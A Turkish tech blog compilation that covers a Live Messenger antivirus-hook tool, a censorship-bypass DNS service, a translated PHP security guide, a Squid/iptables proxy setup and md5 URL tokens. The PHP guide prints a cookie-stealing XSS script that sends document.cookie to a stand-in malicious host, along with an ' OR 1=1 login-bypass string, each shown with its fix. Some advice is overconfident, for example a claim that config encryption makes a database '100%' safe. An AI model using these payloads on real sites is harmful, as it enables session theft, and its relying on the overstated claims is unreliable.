Sisteminizde kurulu olan bir virüs programı var ise ve aktif olarak anlık dosya hareketlerini tarıyor ise aynı anda farklı bir virüs programı kurmak saçma olduğu gibi gereksiz sistem yorulmasına sebep verir.

Live Messenger’ın bu vb. hata mesajlarından sıkılıp Live Messenger’ı kandırma yolu olarak ufak bir program yazdım. Böylece Live Messenger’a ben bu virüs programını kullanıyorum, sende bu programı kullanarak gelen dosyayı kontrol et diyerek kandırıyoruz.

Nasıl Yaparım :

• QMsnAv.exe yi indirip istediğiniz bir yere kopyalayın.
• Aşağıdaki ekran görüntüsünde gördüğünüz gibi Live Messenger’ın Araçlar –> Seçenekler Menüsünden Dosya Aktarımı kısmına girip, “Dosyalarda virüs taramasında bu uygulamayı kullan” seçimini işaretleyin.
• Gözat butonu ile QMsnAv.exe‘yi kaydettiğiniz yerden seçin.
• Artık size gönderilen tüm dosyaları QMsnAv.exe ile taramaya çalışacak, QMsnAv ise size dosya transfer işleminin bittiğini ve ilgili dosyayı açmayı isteyip istemediğinizi soracaktır.

Güvenli mi ?

• Programın kaynak kodları burada verilmiştir. İsteyen Visual Basic 6 ile tekrar derleyip kullanabilir yada geliştirebilir.
• Herhangi bir spy vb. yazılım yada kod içermez.
• Sisteminizde aktif kullanılan bir virüs programı bulunmuyor ise lütfen OneCare’i kullanın yada benim seçimim Avira AntiVirus Free Edition yazılımını kullanın.
• Sisteminize gelecek herhangi bir zarardan biz sorumlu değiliz.

Live Messenger’ın reklam, uyarı, sarı bant vb. gibi saçmalıklarından kurtulmak için a-Patch yazılımını kullanabilirsiniz.

Mahkeme kararı olmaksızın Telekomünikasyon İletişim Başkanlığı’nın kendi keyfi kararları ile engellediği pek çok siteye ulaşabilmek için artık dört takla atmanıza gerek yok. Yabancı bir hizmet olan OpenDNS’in Türkiye merkezli hali yeni yılın ilk günlerinde hizmete başladı. OpenDNS ile yaklaşık olarak aynı işi yapan fakat merkezi Türkiye olduğundan daha hızlı çalışan bu hizmet ile internet sansürlerinden kurtulabileceksiniz.

Nasıl sansürleniyoruz ?

T.İ.B. servis sağlayıcı üzerinde bulunan DNS sunucusunda yasaklanması istenen alan adlarını daha önceden hazırlanmış yasak bilgisi bulunan bir ip adresine yönlendirerek sizin o siteye ulaşmanızı engellemektedir. DNS konusunu burada uzunca anlatmak isterdim ama konumuz şu anda DNS değil. DNS kısaca internet üzerinde bize kolaylık sağlayan bir fihristtir. DNS icat edilmeden önce bir web sitesine girmek için onun kimlik numarası olan IP adresini girmemiz gerekiyordu. DNS, alan adlarının hangi ip adreslerine ait olduğunu indexleyen, biz sorduğumuzda bize şu IP adresi diyen bir sistemdir. T.İ.B. bize gerçek ip adresi yerine sahte IP adresi bilgisi vererek o siteye ulaşmamızı engeller.

AçıkDNS nasıl çalışır ?

AçıkDNS kendi sunucularında kurulu olan DNS sunucusu ile dünyanın çeşitli bölgelerinde bulunan Ana DNS Sunucularından (Root DNS) sorgulayarak bize gerçek IP adresleri temin eder. Böylece hiç bir yasağa takılmadan istediğimiz siteye erişebiliriz.

AçıkDNS Güvenli midir ?

AçıkDNS’in sahibi yakın bir arkadaşım. Sitenin ve sistemin yapımında birlikte ter döktük diyebilirim. AçıkDNS hiç bir şekilde kayıt tutmamaktadır. Aynı şekilde hiç bir şekilde HiJack diye tabir edilen sahte bilgi gönderimi yapmamaktadır. Yaptığı şey Root DNS’lerde sizin istediğiniz bilgiyi çekip size göndermektir.

Nasıl Kullanılır ?

AçıkDNS’e http://www.acikdns.com adresinden ulaşabilirsiniz. Sol tarafta göreceğiniz menüden işletim sisteminize uygun olan videoyu izleyerek AçıkDNS’i kullanmaya başlayabilirsiniz. 

Giriş

PHP, bir çok yazılım dilinden farklı olarak, buffer-overflows gibi hafıza problemleri olan, bundan dolayı güvenlik problemine neden olabilecek bir dil değildir. Aynı zamanda PHP öğrenilmesi kolay ve hızlı bir dildir. Bu kolay ve hızlı öğrenilebilirlik, bu dili bir çok kişinin öğrenmesine, aynı hızda üretim yaparak uygulama geliştirmesine de olanak sağlamaktadır. Ancak bu durum, bilinsizce yapılan kodlama teknikleri nedeniyle kendi içerisince ciddi bir güvenlik problemini yanında getirmektedir.
Bu klavuz size, online güvenlik, web tabanlı yazılım geliştirirken PHP’de temel güvenliği nasıl sağlayacağınız konusunda fikir vermek için hazırlanmıştır. Klavuz içerisinde başlangıç seviyesi kullanıcılar için önemli bilgiler, uzmanlar için belki de gözden kaçan ufak ipuçları bulunabilir.

Atak Tipleri:

XSS Atağı:
XSS “Cross Site Scriptting” anlamında kullanılmaktadır ve bir sayfaya içerik girmek -JavaScript gibi- gibi düşünebiliriz. XSS atakları genelde kullanıcının Cookie (çerez) lerini çalmak amacıyla kullanılır. Bu cookie’ler kullanıcı login bilgileri, sişreleri ya da benzeri önemli bilgileri içeriyor olabilir.

Basit anlamda bir örnek verelim.

$id=$_GET['id'];
echo "Gelen ID degeri:".$id;

Yukarıdaki kodda, $_GET[’id’] degiskeni bir sayı ise problem yok. Ancak ya aşağıdaki gibi bir kodsa?

<script>
window.location.href = "http://kotuamaclisite.com/cookie-calanscript.php?c=' + document.cookie;
</script>

Kullanıcı bir sekilde, bu kotu amaçlı kodu çalıştırırsa, tüm cookie bilgilerini kotü amaçlı siteye devredebilir.

XSS Ataklarından Nasıl Korunurum?

İlk olarak, asla kullanıcı girişi bilgilerine güvenmeyiniz. Kullanıcılardan girilen her bilgiyi mutlaka kontrol edip filtrelememiz gerekiyor. Yani gelen kullanıcı bilgilerini HTML tag’lerinden arındırırsak bir JavaScript kodu çalıştırılamak hale getirebiliriz. Bunu yapmanın en kolay yolu PHP’nin strip_tags() fonksiyonunu kullanmaktır. Bu fonksiyon tüm HTML tag’lerini temizleyecektir. HTML tag’lerini silmemek ama onları zararsız hale getirmk için htmlentities() fonksiyonunu da kullananilirsiniz. Bu fonksiyon, < ve > karakterlerini < ve >karakterlerine dönüştürecektir.

SQL Injection Yönetemi:

Günümüzde bir çok web sitesi verileri barındırmak için veritabanı kullanmaktadır. Bu bağlamda veritabanına girmek için bir çok INSERT, UPDATE ve SELECT işlemleri yapılmaktadır. Buna rağmen bir çok site, form verileri açısında SQL Injection yöntemi ile atağa uğramak konusunda yeterli güvenliğe sahip değildir.

SQL Injection, değiştirilmiş, atak için düzenlenmiş form içerikleri ile yapılan veritabanı sorgularıdır. Bu ataklar veritabanınızdan bir kaç veriyi çalmak, izinsiz login olmak, ya da tüm veritabanını silmek gibi sonuçları doğurabilir.

En genel kullanımı anlatmak için aşağıdaki kod örneğine bakalım:

site_users
WHERE
username = '$username'
AND
password = '$password'
");

if ( mysql_num_rows($result) > 0 )
// login oldu

Yukarıdaki kod örneği, SQL Injection için gerekli ortamı hazırlamaktadır, bu konuda zaafiyet oluştrabilecek bir kod örneğidir. Kötü amaçlı bir kişi yukarıdaki SQL’i değiştirerek sisteme izinsiz giriş yapabilir. (Kullanıcı şifresini girmeden login olabilir)

Örneğin kötü kullanıcı (saldırgan) kullanıcı adı alanına “rob” şifre (password) alanına aşağıdaki gibi bir giriş yaparsa:

‘ OR 1=1 ‘

Yukarıdaki kod şu şekli alır:

SELECT *
FROM
site_users
WHERE
username = 'rob'
AND
password = " OR 1=1

Bu SQL sorgusu ise, kullanıcı adı “rob” olan kaydın şifresi ne olursa olsun getirmektedir. Yani şifre kontrolu gerçekleşememiştir.

SQL Injection Atağından Nasıl Korunurum?

XSS Atağında olduğu gibi, en büyük sorun kullanıcının gönderdiği veriyi olduğu gibi kullanmaktır. Korunmanın en iyi yöntemi ise, kullancıı verisini riskli karakterlerden arındırmaktır. mysql_real_escape_string() fonksiyonu bu amaçla PHP içerisinde yer alıyor. Bu fonksiyon riskli olan ‘ ve ” gibi karakterleri temizlemektedir. Ayrıca, SQL sorgularınızda kullandığınız kullancıı verileri, eğer, sayı olmanı bekleniyorsa intval() fonksiyonu ile gelen verinin sadece sayı bilgisi olan kısmı alınmalıdır.

Dosya Yüklemesi Atağı (File Upload)

Kullancıların yükledikleri dosyalar en büyük güvenlik risk unsurlarının başında gelmektedir. Bu, tanımadığınzı bilmediğiniz dosyaları sunucunuzda barındırmak anlamındadır. Bu dosyalar, dosyalarınız silmek için, veri tabanınızı boşaltmak için olabilir. Ya da daha başka bir çok güvenlik problemine neden açabilecek dosyalar olabilir.

Buna rağmen, güvenli şekilde dosya almak kontrol içerisinde alındığında mümkündür.

Kullanıcıların sisteminize dosya yüklemesine izin verdiğiniz durumlarda, kontrol etmeniz gereken 2 önemli bilgi mevcuttur.

Birincisi, dosyanın “mime-type” ıdır. Yani, dosyanın header’ında bulunan ve dosya tipini belirten bölüm. Örneğin kullanıcının sadece resim dosyası upload etmesini istiyorsanız yüklenen dosyanın “mime-type” ı image/png, image/jpeg, image/gif, image/x-png ya da image/p-jpeg olmalıdır. Aşağıdaki kod bu kontrolü gerçekleştirir.

$validMimes = array(
'image/png',
'image/x-png',
'image/gif',
'image/jpeg',
'image/pjpeg'
);

$image = $_FILES['image'];

if(!in_array($image['type'], $validMimes)) {
die('Üzgünüm, izin verilmeyen dosya tipi.');
}

// İşlem tamam yüklemeyi gerçekletir vs vs.

İkinci kontrol etmeniz gereken bilgi ise, dosyanın uzantısıdır. Zira, mime-type bilgisi manuple edilebilir bir bilgidir. Bu bağlamda dosyanın uzantısını kontrol etmeniz gerekir. Zira bir kullanıcı, bir imaj dosyasının mime-type ı ile bir PHP dosyası gönderebilir. Bu durumda siz bir PHP dosyasını sisteminize almış olursunuz ki bu çok ciddi bir risk faktörüdür.

Bu durumdan korunmak için, sisteminize yüklediğiniz dosyaların uzantıları, siz tanımlamalısınız. Bu tanımlamayı ise mime-type bilgise göre yapabilirsiniz. Aşağıdaki örneğe bakalım:

$validMimes = array(
'image/png' => '.png',
'image/x-png' => '.png',
'image/gif' => '.gif',
'image/jpeg' => '.jpg',
'image/pjpeg' => '.jpg'
);

$image = $_FILES['image'];

if(!array_key_exists($image['type'], $validMimes)) {
die('Üzgünüm, izin verilmeyen dosya tipi.');
}

// Dosya uzantısını barındırmayan dosya adını alalım:
$filename = substr($image['name'], 0, strrpos($image['name'], '.'));

// Mime type göre dogru uzantıyı verelim
$filename .= $validMimes[$image['type']];

// İşlem tamam

Yukarıdaki örnekle, bir PHP dosyanının sanki bir resim dosyasıymış gibi sisteminize PHP dosyası olarak yüklenmesini engellediniz. Dosya mime-type’ı PNG’yi işaret ediyorsa, dosya uzantısı .png olacaktır.

Dosya Include Atağı:

Kullanımı çok yaygın olan index.php?sayfa=xxxx.php şeklideki dosya include yöntemi çok ciddi risk taşıyabilir. Bu kullanım genelde, menü yapısı, logo gibi bölümleri index.php ye kaydedip içerik bölümünü başka dosyalarda saklayarak site yönetimini kolaylaştırmak için kullanılır. Bu durumdaki yanlışlık,

include $_GET['sayfa'];

gibi bir kod ile gelen değişkene göre sayfayı include etmektendir.

Yukaridaki kullanımda PHP’nin allow_url_fopen ayarı ON durumda ise, yani aktifse, saldırgan başka bir sunucudaki dosyayı sitenize include edebiliyor demektir. Kodunuz da echo file_get_contents() değil de include kullanıdığı için bu çok sık karşılaşılan bir açığa sebebiyet vermektedir. Bu durum, sunucunuzun tüm kontrolünü saldırgana bırakmak demektir.

Bu durumdan yapabileceğiniz 2 şey vardır.

Birincisi, bir liste oluşturup gelen değişkeni burada kontrol etmektir. Örneğin şöyle bir kod ile:

switch($_GET['sayfa']) {
case "hakkimizda":
include('hakkimizda.php');
break;
case "haberler":
include('haberler.php');
break;
default:
include('anasayfa.php');
}

Bu kod ile include edebileceğiniz her sayfayı belirtiyor ve belirtmediğiniz sayfa için anasayfa.php dosyasını include ediyorsunuz. Bu yöntemin zor tarafı, ekleyeceğiniz her sayfayı bu listeye de eklemek zorunluluğudur.

İkinci bir yöntem ise, dışarodan gelen $_GET['sayfa'] değişkenini kontrol etmek ve temizlemektir.

$sayfa = preg_replace('/\W/si', '', $_GET['sayfa']);

include('./'.$sayfa.'.php');

Yukarıdaki kod, “..”, “/” gibi karakterleri temizleyerek kullanıcının 212.111.111.111 gibi ip ya da http://www.kotusite.com gibi domain belirtmesini engeller. Bu verileri 212111111111, httpwwwkotusitecom şekline çevirir.

Dosya include atağındaki diğer bir açık ise, include edilen dosyaların uzantılarını .inc gibi sunucunun tanımayacağı bir uzantı yapmaktır. Örneğin, config.inc gibi bir dosya yapıp bunu include etmek çok sakıncalı olabilir. Zira, saldırgan bu dosyanın adını ve yerini öğrendiğinde, eğer web suncuunuz bu dosyayı çalıştırabilir bir dosya olarak tanımıyorsa (ki tanımama ihtimali yüksektir), saldırdan dosya içeriğini görecektir. Bu durumda yapabileceğiniz, her türlü dosya uzantınızı .php yapmaktır. Boylece saldırgan bu dosyaların içeriğini görüntüleyemez. Diğer bir yöntem ise Apache sunucular için, aşağıdaki gibi bir .htaccess dosyası olusturarak .inc dosyalarının ulaşılmasını engelleyebilirsiniz.

<files ~ "\.inc$">
Order allow,deny
Deny from all
</files>

Register Globals Atağı:

register_globals değeri PHP ayarında ON durumda ise, $_POST, $_GET, $_SERVER, $_COOKIE, $_REQUEST, $_FILE ile gelen değişkenlere global değişkenler olarak ulaşabilirsiniz. Yani mesela $_POST[’mesaj’] değişkenine $mesaj olarak ulaşabilirsiniz.

register_globals değeri güncel PHP kurulumlarında varsayılan olarak OFF durumdadır. Ancak eski bir PHP kurulumu bulunan sunucuda, ya da sistem yönetici tarafından özellikle açılmış bir sunucuda ON durumunda olabilir (ki paylaşımlı hosting firmaları geçmiş müşterilerinin kodlarının uyumu adına açabiliyorlar).

register_globals’in ON olamsı durumu için aşağıdaki kodu inceleyelim.

dosya.php dosyası örneği:

if($_POST['username'] == 'rob' && $_POST['password'] == 'foo') {
$authenticated = true;
}

if($authenticated) {
// giriş başarılı bişeyler yapalım
}

Saldırgan, dosya.php?authenticated=true şeklinde bir URL çağrımı ile, sisteme izinsiz giriş yapabilir.

Bu durumda ne yapacağız, register_globals değerini OFF yapamayabileceğimiz durumların her zaman gerçekleşebileceğini düşünerek, kodumuzu şu şekilde değiştirelim.

$authenticated = false;

if($_POST['username'] == 'rob' && $_POST['password'] == 'foo') {
$authenticated = true;
}

if($authenticated) {
// giriş başarılı bişeyler yapalım
}

Bu kod, $authenticated değişkenini sayfa başında false yapmaktadır. $_POST’tan gelen veri eğer uygunsa $authenticated true yapılır. Böylece, dışarıdan gönderilen değişken ile izinsiz giriş yaplıması engellenmiş olur.

Derleme ve Çeviri : Okan ARI

Bende izlediğim bazı gruplarda bu olayı nasıl yapacaklarını soran bir çok arkadaşa Linux+Squid+iptables 3 lüsünü öneriyorum. Bilinenin aksine Linux işletim sistemleri bundan 5 yıl öncesinde olduğu gibi anlaşılması zor işletim sistemleri değiller artık. Şimdi aşağıdaki yazımda bunların nasıl kurulacağını ve nasıl konfigure edileceğini anlatmaya çalışacağım.

Öncelikle gereksinimlerimizi yazalım ;

• Herhangi bi Linux Dağıtımı (tercihen CentOS, Ubuntu)
• En az 486 DX2 66 Mhz. işlemcili 64 mb RAM li bir pc.
• CDROM
• 2 Ethernet Kartı

Ben yazımda CentOS kurulu bir Virtual Machine bilgisayar kullanıcam. Bu dağıtımları kendi sitelerinde bulabilirsiniz.

CentOS – http://www.centos.org
ubuntu – http://www.ubuntu.com
ubuntu Türkiye – http://www.ubuntu-tr.com

CentOS Server linux dağıtımını CDROM’a takıp pcmizi çalıştırdığımızda karşımıza kurulum ekranı gelicektir.(Resim 1)

Resim 1 :

Bize ilk sorduğu Medyanın (CDnin) sorunsuz olup olmadığını test edip etmemesidir. CD nin temiz olduğuna eminseniz Skip diyebilirsiniz.

Kurulumu yapmamıza yardımcı olacak olan kurulum sihirbazı yüklenmesi tamamlandığında karşımıza Resim 2 deki gibi bir ekran gelicektir. Artık kurulumumuza başlayabiliriz.

Resim 2 :

Next dediğimizde bize sistem dilini devamında sistem klavye dilini belirlememizi isticektir. Her ikisindede Turkish seçilmelidir.

Devam eden ekranda sistemi kurmak için diskin bölümlerinin oluşturulması aşaması gelecektir. Burada Diski otomatik bölümlendirmesini ve mevcut bölümlerin silinmesini onayladığımızda kur diskimizi Resim 3 teki gibi parçalara böler.

Resim 3 :

Bir sonraki ekran Önyükleyici belirlenmesi. Bu ekranda bir değişiklik yapmadan İleri diyerek devam edelim. Devamında ise Ağ yapılandırması ekranı karşımıza gelecektir. Öncelikle bir ağ planımızı yapalım. Sizde kendinize uygun bir şekilde yapabilirsiniz.

Modem IP : 10.0.0.1
DMZ IP Aralığı : 10.0.0.3 – 10.0.0.254
Linux WAN IP : 10.0.0.2
Linux WAN Gateway(Ağ Geçidi) : 10.0.0.1
Linux LAN IP : 10.0.1.1
Local IP Aralığı : 10.0.1.2 – 10.0.1.254
Local Ağ Geçidi : 10.0.1.1
Alt Ağ Maskesi : 255.0.0.0

Not : Demilitarized Zone (DMZ) Linux tarafından kısıtlanmadan direkt modem üzerinden internete bağlanmasını istediğiniz cihazlardır.

Diagram :

Bu durumda Linux makinemize bağlı 2 adet ethernet kartını network ayarları ekranında yukarıdaki tabloya uygun bir şekilde ayarlıyoruz.(Resim 5)

Resim 5 :

Bir sonraki adım Güvenlik Duvarı ayarları. Biz burada CentOS üstune iptables kuracağımızdan CentOS üstünde gelen güvenlik duvarını kullanmıyoruz. Güvenlik duvarını ve SELinux ı kapalı hale getirip devam edelim.

Sonraki ekranda Sistem Dilini English yapıyoruz. TR desteği tam olmadığından ve çıkan sorunlara ingilizce yanıt bulmak daha kolay olduğundan ingilizceyi seçiyoruz.

Bir sonraki ekranda artık konfigurasyonumuz bitiyor ve bizden sistemin yöneticisi olan root kullanıcısının şifresini belirlememizi istiyor. Şifre yazıp devam ediyoruz.

Sonraki aşamada bize neleri kurmak istediğimizi belirtmemizi istiyor. Bu aşamada Ön tanımlı paketleri kurmak şu anda bize yeterli. Ön tanımlı paketlerimizi kuruyoruz. Ve İleri deyip kurulumumuzu başlatıyoruz.

Ve CentOS Kurulumumuz tamamlanıyor. (Resim 6)

Resim 6 :

Sistem yeniden başladıktan sonra terminal ekranında açılır ve bizden login olmamız istenir. Daha önceden belirlediğimiz root kullnıcısı ve şifresi ile sisteme login olunur. (Resim 7)

Resim 7 :

Bundan Sonraki adımları burada kod çerçevesinde yazacağım.

Öncelikle Network ayarlarımızı tekrar tanımlayalım ve sınayalım :

 [root@proxy ~]$ ifconfig eth0 10.0.0.2 netmask 255.0.0.0 [root@proxy ~]$ ifconfig eth1 10.0.1.1 netmask 255.0.0.0 [root@proxy ~]$ route add default gw 10.0.0.1

Devamında sunucunun güncelliğini kontrol ediyoruz.

[root@proxy ~]$ yum upgrade ...... Transaction Summary =============================================================================
Install 3 Package(s) Update 169 Package(s) Remove 0 Package(s) Total download size: 187 M Is this ok [y/N]:Y # Y tuşuna basarak devam ediyoruz.

yum gerekli bileşenleri kontrol edip internetten indirip sisteme kuracaktır.

CentOS ile apache webserver, squid, iptables zaten gelmektedir. Eğer kurulumda sisteme yüklenmemişse aşağıdaki kodu yazarak sisteme kurulmasını sağlayabilirsiniz.

 [root@proxy ~]$ yum install httpd php iptables squid

>

Şimdi bize bir adet metin editoru lazım. Config dosyalarımızı rahat bir şekilde düzenlemek için. Ben bu işlem için Pico/pine/nano yu kullanıyorum. Linux terminal ekranından bir adresten dosya çekmek için wget komutu kullanılır.
Not : Adres sığmadığı için bu linkin adresini kullanınız.

 [root@proxy ~]$ wget ftp://ftp.nluug.nl/pub/ibiblio/distributions/smeserver/releases/testing/7.2/smeos/i386/CentOS/RPMS/pine-4.64-3.el4.rf.i386.rpm [root@proxy ~]$ rpm -Uhvf pine-4.64-3.el4.rf.i386.rpm

Böylece artık bir metin editörümüz var (pico)

Artık Webmin (Linux Yönetim Web Arayüzü) kurabiliriz.
Not : Adres sığmadığı için bu linkin adresini kullanınız.

 [root@proxy ~]$ wget http://kent.dl.sourceforge.net/sourceforge/webadmin/webmin-1.340-1.noarch.rpm [root@proxy ~]$ rpm -Uhvi webmin-1.340-1.noarch.rpm

Webmin kurulduktan sonra ağda bulunan herhangi bir makineden browser adres çubuğuna http://10.0.1.1:10000 yazdığımızda karşımıza webmin panel gelecek ve root kullanıcısı ve şifresi ile login olup sistemdeki ayarlamaları bu panel üzerinden rahatça yapabiliriz.

Webmin’in dili varsayılan olarak ingilizce gelir. Soldaki menüden Webmin Language/Themes ten Dil seçimi yapabilirsiniz.

Squid Proxy Sunucusunun çalışması için Webmin panelimizde Sunucular bölümünden Squid Proxy Sunucusunu seçiyoruz. Squid ilk defa çalışacağı için Cache için bir klasörün ilklendirilmesini isteyecektir. Resim 8 deki gibi Cache İlklendir butonuna basarak bu işlemi yapalım.

Resim 8 :

Squid kurulumumuz tamamlandığına göre artık Güvenlik Duvarımızı çalışır hale getirme zamanı geldi. Bunun için Linux config dosyalarının bulunduğu /etc klasörüne bir dosya oluşturup bunun içinde iptables ayarlarını tanımlayacağız. ve bu dosyayı her açılışta çalışması için ayarlayacağız. o yuzden tekrar terminale geçiyoruz.

Linux sunucumuz ağda olduğuna göre artık ne monitöre nede klavye mouse ihtiyacımız var. Terminali ağımızdaki herhangi bir pc den de yönetebiliriz. Bunun için Putty isimli ufak bir SSH bağlantı yazılımı kullanıyoruz. Programı bu linkten indirebilirsiniz. Kullanımı gayet basittir. Çalıştırdığımızda gelen ekranda Host kısmına Linux Sunucumuzun IP adresini yazıp SSH ı seçmemiz ve Connect dememiz yeterlidir. Putty üzerinde kopyalama/yapıştırma Windows gibi değildir. Kopyalamak için kopyalanacak yeri seçmeniz yeterlidir. Yapıştırmak içinse yapıştırılacak yere imleci getirip mouse sağ butonu ile yapıştırılır.

Güvenlik Duvarını aktif etmek için Putty ile Linux Sunucumuza bağlanıp sırası ile aşağıdaki komutları verelim.
Not : Örnek Güvenlik Duvarı Konfigurasyon Dosyası için tıklayın..

 [root@proxy ~]$ cd /etc [root@proxy etc]$ pico rc.firewall

# Burada metin editörümüz bize boş bir rc.firewall dosyası oluşturup düzenlemek için ekranımıza getirir. Yukarıda verdiğim dosya içeriğini kendinize göre düzenleyip buraya yapıştırarak Ctrl+X ve Y Enter diyerek kaydedip çıkmamız gerekmektedir.

 [root@proxy etc]$ chmod +x rc.firewall [root@proxy etc]$ ./rc.firewall

Böylece yukarıda tanımladığımız tüm güvenlik tanımlamaları uygulanmış oldu. Artık Squid Proxy Sunucusu üzerinde Kullanıcı tanımlamaları ve kısıtlama tanımlamaları yapmaya başlayabiliriz.

Çok özür dileyerek makaleme uzun bir arada sonra devam ediyorum.

Şimdi squid proxy sunucusunun kullanıcı tanımlamalarını yapmaya başlayabiliriz.

Webmin üzerinden squid sunucusu ayarlarına girdiğimizde karşımıza Resim 8 deki gibi bir görüntü gelmesi gerekmektedir. Giriş kontrol kısmı kullanıcı tanımlamarı yapmamıza ve bu kullanıcılara kısıtlamalar vermemizi sağlıyacaktır.

Giriş kontrol kısmı temelde 2 alandan oluşur. Bunlar tanımlamalar ve kısıtlamalardır.
Sol taraf Tanımlamalar, Sağ taraf ise kısıtlamaları oluşturur.

Öncelikle yukarıda tanımladığımız ağ özelliklerine uygun örnek bir squid configuration dosyasını sizlere sunacağım. Bu dosya üzerinde kendi networkünüze uyarlayarak /etc/squid altına eskisinin üstüne yüklerseniz sizin için çok rahat olucaktır. Geri kalan tüm ayarlamalarıWebmin üzerinde çok rahat bir şekilde yapabilrisiniz.

Önemli Uyarı : Unutulmaması gereken en önemli şey sağ tarafta bulunan kısıtlamalar alanının en altında her zaman İzin verilmedi(Deny) all kısıtının bulunmasıdır. Bu kısıtın altında bulunacak tanımlamalar Squid tarafından dikkate alınmaz ve kullanıcı kısıtlanmış sayılır.

Tüm bu ayarlamalar tamamlandıktan sonra artık Squid ve iptables i çalıştırma zamanımız gelmiş demektir.

 [root@proxy etc]# service squid start Starting squid:                                            [OK] [root@proxy etc]# ./rc.firewall          setting global variables          applying general security settings to /proc filesystem          applying nat rules          applying icmp rules          applying squid rules          applying the open port(s) to the firewall rules          applying default drop policies  ### quicktables is loaded ### [root@proxy etc]#

komutları ile firewall ve proxy sunucumuzu çalışır hale getirdik.

Makalede kullanılan örnek dosyalar

Örnek iptables Dosyası
Örnek Squid Configuration File
Örnek MSNYasak Dosyası
Örnek Yasak Dosyası

Kolay Gelsin.

İyi Çalışmalar…

Link : http://www.practicallynetworked.com/sharing/xp/filesharing.htm

İyi Çalışmalar…

Link : Unlocker 1.8.5

Kendi Sitesi : http://ccollomb.free.fr/unlocker/

Bilgisayarınızda anti-virüs yazılımı olmadığı durumlarda, bu yazılıma sahip bir bilgisayarda daha önceden hazırlanmış olan acil durum disketi ile diskinizde ve disketlerinizde virüs taraması yapabilirsiniz.

Anti-virüs yazılımlarının tarama işlemi sonrasında virüs bulamaması bilgisayarda virüs olmadığını değil, sadece tarama işleminde kullanılan anti-virüs programlarının tanıdığı virüslerin mevcut olmadığını gösterir. Kullanılan anti-virüs yazılımlarının buldukları virüsleri silmeleri veya bulaştıkları dosyalardan temizlemeleri mümkün olmaması da zaman zaman karşılaşılan bir durumdur. Bu durumda kullanılan anti-virüs programının güncellenmesi veya daha güncel başka bir anti-virüs yazılımının kullanılması uygun olacaktır. Yani, kullanılan anti-virüs programının tanımadığı bir virüsün bilgisayarınıza bulaşmış olması ihtimali her zaman vardır.

Örneğin

http://xyz.com/kategori.php?k=1 sayfası k parametresi ile kaçıncı kategoriyi görüntülemek
istiyorsanız ona ait olan resmi gösterir.

Daha özel sayfalarımız olduğunu varsayalım. Mesela kullanıcılarımızın icq da olduğu gibi bir kullanıcı numarası ile tekilliğini sağladığımızı varsayalım.

http://xyz.com/kullanici.php?no=1 şeklinde ki bir yapının 1 nolu kullanıcının bilgilerini diğer kullanıcılara göstermek için kullanıldığını varsayalım.

Sitenizi gezen her hangibir kişi sitede diğer kullanıcı bilgilerine ulaşmak için tek yapacağı no parametresini arttırarak sayfayı yeniden çağırmak olacaktır.

Böylecene izin verdiğiniz kadar olan bilgilere rahatlıkla ulaşabilecektir. Eğer sizin istediğiniz sadece gösterilen bağlantıdan kullanıcı bilgilerine ulaşmak ise şimdi anlatacağım yöntem işinize yarayabilir.

md5() fonksiyonu

md5 fonksiyonu bir katarın (string) 32 karakterlik hexedecimal hash değerini MD5 message digest algoritmasını kullanarak döndürür. Bulunan değerden (çıktı) girdiye tekrar geri dönülemez. Yani algoritma tek yönlü bir şifreleme algoritmasıdır. Php’de string md5(string str) şeklinde tanımlanmıştır.

örnek vermek gerekirse md5 lenmiş girdi ve çıktı aşağıdaki gibi görülebilir.

for($n=1; $n < 10 ;$n++ )
{
$str = md5($n);
echo "$n:$str";
}
Çıktısı:
/*
1:c4ca4238a0b923820dcc509a6f75849b
2:c81e728d9d4c2f636f067f89cc14862c
3:eccbc87e4b5ce2fe28308fd9f2a7baf3
4:a87ff679a2f3e71d9181a67b7542122c
5:e4da3b7fbbce2345d7772b0674a318d5
6:1679091c5a880faf6fb5e6087eb1b2dc
7:8f14e45fceea167a5a36dedd4bea2543
8:c9f0f895fb98ab9159f51fd0297e236d
9:45c48cce2e2d7fbdea1afc51c7c6ad26
*/

md5'i nasıl kullanacağız

http://xyz.com/kullanici.php?no=1 şeklinde bir URL üzerinde ziyaretçi kolayca mantık yürütüp no yu arttırarak diğer kullanıcılar hakkında bilgiye ulaşabilirdi. Dahada kötüsü bir program yapıp sunduğunuz kadar bilgiyi ele geçirebilir.

Biz bu kişilerin işlerini biraz daha zorlaştırmaya çalışalım. Yukarıda ki URL adresini kendimiz yaratalım ve http://xyz.com/kullanici.php?no=1&m=c4ca4238a0b923820dcc509a6f75849b şekline getirelim.

Bu işlemden sonrada kullanici php'de kontrol yapmamız gerekiyor. Kontrolun aşağıdaki şekilde olduğunu varsayalım.

if($m!=md5($no))
{
echo "İzinsiz ulaşım.";
exit(); // Burada bir hata sayfası çıkarmak daha mantıklı
}
// Buraya gelebildiyseniz normal görüntüleme işlemne devam edebilirsiniz.


Daha iyisi
Tamam bu yöntemi kullandığınızı varsayalım peki ya bu dokümanı okuyan tek kişi siz değilseniz. Birinci parametreyi md5 leyip ikincisini bilgiyi ulaşabilen kişi yaratabilirse ne olacak.

Küçük bir çözüm program içinde md5 fonksiyonuna bir ekleme yapmak. Örneğin bir anahtar ekliyebiliriz.

$anahtar = ':) kimse bilmez';
for($n=1; $n < 10 ;$n++ )
{
$str = md5($n.$anahtar);
echo "$n:$str";
}
Çıktısı :
/*
1:ca4dd161be8e0eb1822c8774406b598b
2:7af9fc853719a96a661c9173e4be5f5a
3:1ac140b91f245a4406ff6f4f99af5045
4:de5e507a1468d4add1d87e343a6adb56
5:c5a040e097b07346e3cd4fa9df917b5a
6:61e2e0e8423585e8b9f32e09ac9fa458
7:4528f12d61df3ba3a2f08a5c82646441
8:086cf3e596d30bc8ed7dc2de21b5fcfa
9:02c70560d05402b519204ae2911bb004
*/


Gördüğünüz gibi değerler değişti. Anahtarı kimse bilmediğine göre artık sorunumuz yok. Unutmamalı ki bu sadece işleri biraz zorlaştırmak için bir yöntem. İnsan yapımı olduğu sürece bir şekilde bilgileriniz güvenli değildir. Ama biz yinede eşeği bağlayalım.



deny from all


deny from all


deny from all



2. Config dosyalarını şifrelemek, sitenizin ayar dosyalarını şifrelerseniz kötü amaçlı kişiler ftpden yada fso ile sitenize girse bile config dosyalarınızı şifreleyerek veritabanı bilgilerine ulaşmalarını engelleyebilirsiniz bunu sağlarsanız %100 veritabanınız güvenli hale gelir.

